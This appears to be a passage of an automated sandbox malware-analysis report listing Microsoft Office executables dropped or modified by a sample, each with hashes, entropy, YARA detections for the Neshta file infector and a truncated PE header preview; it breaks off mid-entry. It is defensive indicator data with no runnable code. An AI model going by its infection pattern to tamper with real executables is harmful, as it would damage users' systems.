                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4135504331115705
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCC+MHzv1nArfoWBgJCSTgHyyf:sr85CDuv1nqQ2zSESy
                                                                        MD5:A937F48D8198AB59DF93A63E834C4AAF
                                                                        SHA1:4DA8ED9F7A886A8437562470A199744DF6E88F24
                                                                        SHA-256:CA2CA4A45AB550D894AA4B16919FF38ABB7784E532C327891DF71645AB845C6A
                                                                        SHA-512:490CDFC2D7AAF7142889398D70DE668CCCD8D4A52AF7C5FA9D64540CE2740F09A481293F4DFFED1ECCED9827148313D2296CC9BFC9716A88814544930C9DE551
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.344917752925491
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDt+pejhS5enb1o24/tmIY514oZFt4s:sr85CDt+pGQ5E1o24VmIYX4oZP4s
                                                                        MD5:EA546BBE947027BA147DE2719F53D051
                                                                        SHA1:38B150F5A8BE8E19B5D1F2824F8EDE784DE2C6E6
                                                                        SHA-256:930F29A1D4152D23CB5F1E60693191F2865F56EA5474BF720BDC286D518CD9C1
                                                                        SHA-512:D456962B5511F76AF309345C22FCB20EDB120CF4EC3388300FEE1864B13859C605C40B6E86357E698DACA5AED60F56B59DFF1655E3059A9065B9550A7A3C9E1E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.464347380493513
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCSGNDd85lS8adLs4XK9OtiRk+7mLpNKahE:sr85C9NDS5lS8D0K8tMk+7ms
                                                                        MD5:072EDD1A5D3A99C26EA9987890989B31
                                                                        SHA1:6ECC5A3EBEB7EC6EEBBEF28CEB67079A92F57107
                                                                        SHA-256:598CA2D9EB855C5D53C9C19374AFFAAE2E4A6A9C9EBF1F46D2B025B5BD8731B4
                                                                        SHA-512:D11D018159148C9926450A3047B207484D1B31B80BB975B435D6E0FEB497F60625450273C1D834FFAD74C7C581A80224898FDCDC41BB9D3BD799E70AE8EF838E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4498443082331764
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCLddbrls2itD1NrBOTe5IfY2X36Be:sr85CjbO1OTqcX36Be
                                                                        MD5:187B658322698CB74D48476EB2ECB171
                                                                        SHA1:3C4371425F833F6C7643E09BEBA5762B67081611
                                                                        SHA-256:7460BB6E5A2E43F3C737730FE5F9FC5E199072C61B870C07FF35207F333EE496
                                                                        SHA-512:3013808486F1445457BC00B919AFDCC46297B3F167A876EE5F028D50456EBE582C05882D99A0E677531C9FD3796F574AD88AB48FBF394A124F425894F841D636
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.336782734218808
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCEbf/h1xmGzUiVZd0p813HmTJhM3:sr85CMfJ1xmzsHmTHM3
                                                                        MD5:A3977FA0A7C20B05EC69FADE4F852D71
                                                                        SHA1:FE2C747F4DA1C5C85C55EB755CA32D59B0B1EC43
                                                                        SHA-256:1F3B9AB4F318C962967E9418DFEEBF251EF610A0ECE5570E166D84B6A730A932
                                                                        SHA-512:CD8082F275380F4CD67BA08904C116E921C428D8D6BD8BF411A93B42CA9276332AB6E7F46EEC05C697662A98CC70841D12AD3EA6A3DE54EB575DE11BF2A0A1B2
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.531432224892055
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCN5Ss6w5T7tIc+9KLSifgpM5:sr85CrSsp+9KSM5
                                                                        MD5:A651847108A83A8B2A3B75A66403B0DC
                                                                        SHA1:EA7CFC3C984B676C322578E80DCD78DDA75E5A2C
                                                                        SHA-256:A1616D454E5EE365285A3E03455CED1FD70D8EEB682D47A8379EB08CF801D325
                                                                        SHA-512:0B97CD6F46A4660C27E99F140D07BA7F0F380E32062D5F9AF550C161E0191332EB27A196C5CAEFEB94A091CF9294FFEE91604D0FEF329260F768D9669591E2CE
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.556968630457308
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVFFlJhOo/ovdHk4h6zeXVv:sr85CVFFlJhOoGt66F
                                                                        MD5:FB0697C512E65305CF24EFA18EC58086
                                                                        SHA1:B924F5AFE1A14163E20DB2CDCE980017C1461D1E
                                                                        SHA-256:CCA73F1C0206BBB9D6567616808D4BADAFAB7796ED40FC86097032802F2381D3
                                                                        SHA-512:FA3AD9699129E24AEAC778B38EF1B6CEBA11B226E6636635224FCB9019036D9E11726F11F50A9D1D531A8A6F08B5D3A3B650E7416655113284B63412C01B1F60
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.131108501135707
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJaFFlJhl7XC0dHPgzh263DX:JxqjQ+P04wsmJCVFFlJhlLDHmdzX
                                                                        MD5:2DCEF042EE374AC5BA2307EE6D97FFAE
                                                                        SHA1:3E39AD4F60367BAFB47B3759253064F7BA57A92B
                                                                        SHA-256:C83153D11C1D63FF5C330035DD66A958BF19EC465969D82DE87351A2C5F7A99D
                                                                        SHA-512:9319A16EA4B3D49FC1CFC4FE9E5890E2DDAA3E5D1523A150C77E0201C727EA0580E0B2D79CD4914968305B037B987494D57604E4792790069E992EEEE3D5324B
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.254281392784178
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJrBE27rCNzU3GLCAAhUSCr1HkueFNUx+:JxqjQ+P04wsmJCKEJzbmAoDucEMQnF0
                                                                        MD5:D7BF211CED7D30A27312CE4DA2487EE1
                                                                        SHA1:CE664FBA8F5BEAA728CB7EAE107C5ED3810A5DDF
                                                                        SHA-256:9266432725D9466253A4F1F609C9A2DD85FC82B3A0E3A6C43FCB1A267C976265
                                                                        SHA-512:260EA864A9512B243DD18EC3C4D6CA7782DD3ED117AA553E6C30F3249655EEDB3768AC190432CBA66078F93C83F8B05CAB352B254FB58C3586EF56F2C3482EED
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.369176164130001
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmmgFboVWAfMOD9nwcP4McxAF+V2r9Q:sr85CmhFbG5n7vcxAwVIu
                                                                        MD5:E883EB6C4D29614F1887EDF6A2412659
                                                                        SHA1:33DAF7D41A5C6D4D8AB1C91160F775D9810E10F9
                                                                        SHA-256:BE47F38C1D1A3806AD27867DF41BF62AFB77FADCAD4F00CF3B68FD469E1B2154
                                                                        SHA-512:EF18F22EB51AE378651FD7421E56EC682BE64AED01D79FDC1E3366459690AE52E312B4BE3A70C50653EC98C261EE2557C4B4F908AC8254E47B96F7268847F665
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.694866680260046
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC5wI4PqxgWvwG+TUawK:sr85C5wslwG+TUawK
                                                                        MD5:A851E7A4D035C32FCB2830718B34F01C
                                                                        SHA1:6D89FD230ADE8F14971A600591A8B6FAF67CD770
                                                                        SHA-256:73610C44EE38B1785E018C2BC869052729D56C65545F52EE5D2AB89C8C7B6DCE
                                                                        SHA-512:77726930C4BFE2DF33FCADA1A4A493F8DB8B3A5681C5D79DC51F9625C4110680DFA50C44CA272B71E46175FF56954B1583B9771B73412D25D06954AF8AAF81E8
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.511827025814232
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHz6xccTu/YnwN9+ko47VGsKkfrwayHd+f:sr85CT6yHYn+o4Jrn
                                                                        MD5:2DBF9767B1524319753ADE899740500C
                                                                        SHA1:D684A9E8CC28A5185CF477554DF2065D73126877
                                                                        SHA-256:14143B435D60E49B251E80E37857E98D36088EB0CBE02C4C630F381E37BA8F0B
                                                                        SHA-512:A7B9EA44485796E0AA8C51A2A762EA95640EE34FEA51C3F043A5EC37E99EE95054F610C8FB72C445609F90B6EBFA5590036294B8E4770BD483E8926B38C7BDB3
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.361986604416892
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC4QTS8CYtvYSi+GAqeqCifxUajaQ:sr85C42S8/caAUSaQ
                                                                        MD5:8F8291D79A298A9B071864C651BB0794
                                                                        SHA1:F7614B1E0D476F1CBC75B5D698711F9DF460F773
                                                                        SHA-256:E9562B1B83495930753D145E9834CCA9128745E3163C060A4AA3D7DA62AA468F
                                                                        SHA-512:160D10672400D32BB10A059CC2AF3CA79810A9D0FDB88B79F6E0BB208DA26F973965853A429A7D9D4CD30570E015F17EB458DF6C6311BB89394AF46ED8B189E7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.56237653560924
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/MyzuDxqDq2m1eHwSFdrdAHZY:JxqjQ+P04wsmJCOxzuDxqDsmwSFbuY
                                                                        MD5:2CF8F2ECEB42B70A5493D1EAEAC6B20A
                                                                        SHA1:B411993C6352F4B026153AE4010A6C2D7B1ACE3B
                                                                        SHA-256:A85EB54DE3BE548DBE89BC47098B417F4C1029BA084D0B15F75687D0751EF44E
                                                                        SHA-512:8D2514F16C8D47CE668397B6DEF1A59A4D2C7B7E4A8E7613865C4833BE0B882D87AECB02C049B7496D633CA740DEB33A59DE6D0488F21C26109C89F8C511570D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.388189611386593
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/jWSlFQQoUmydAHZk6:JxqjQ+P04wsmJCOjTlWFauk6
                                                                        MD5:62A21A597FA5F5C489D266A87694FE61
                                                                        SHA1:8A9C326ABA5638F6B91BA8DD18D258998CC9D25B
                                                                        SHA-256:D35B0D2411B6D5CDE4F61E5EBD70BBB1644AAE5E95EF417E3E885B20C194DE49
                                                                        SHA-512:F4F9F7C8BDCDC7CAC1D491E528E88464A78F6254F44F2C3758860B495E188B607EA2FB2B292CCD82829F1E462EC07BFDD5F0F1729F7083C9FA398FD7EC133E26
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.131620925268659
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJDK2sNTXC8cEGV6GskwTO:JxqjQ+P04wsmJCOKZxXk6GskwTO
                                                                        MD5:1F414E9B0D1C3584418658367EC9242F
                                                                        SHA1:5D11420BEB0507F3A71925E2A0A2DC36EA1265DF
                                                                        SHA-256:CEB5DB2FF4B04E0C3683D039DB97ACC145C5FB9DD026A7DC9B84F12D424E9488
                                                                        SHA-512:1AE9A3653B774AACEA8A2CD24ED9BAAD8245967E16122F53099A8A640D6BF5C055651C50B5D83C4EBF962060FE021A274EDBFB818093A783884C9AC6DB822D03
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4980851403396676
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHJDYG7YSUhCD8TanIVayX0TfC8cvB11lV:sr85CpDDkSQCfLy0fk11lV
                                                                        MD5:D4811ACDE0C5F48DACC1BBC3E310E8D8
                                                                        SHA1:06F814E81524B40587E503E32B8865D66A8383A6
                                                                        SHA-256:3B5D056392B165F9001BF785E6F91187B75A67F0209E5C189AE0764A66FF3E10
                                                                        SHA-512:6BE82945EAB1E9FD9BA507045B6B45799AFD11F5A3A30949E03FA100F93750DD0ECEBECABDB1883B764C90791ABED09EE191588BB8A8241AC6A6AFAAA120C169
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.57605386644689
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMfSoIt2ZzzV9uc1EshwMDkEcAv4i+:sr85Cnkz//1DgEcAv5+
                                                                        MD5:100E15577B28178663E63AB854D28B4A
                                                                        SHA1:DC7D931ECDA8C09D0D2B43988E6D689A20E080F1
                                                                        SHA-256:238254BCE07446426D478897AC3DE27DE2B9606B2E8477F7DDAF8A20A2999FC4
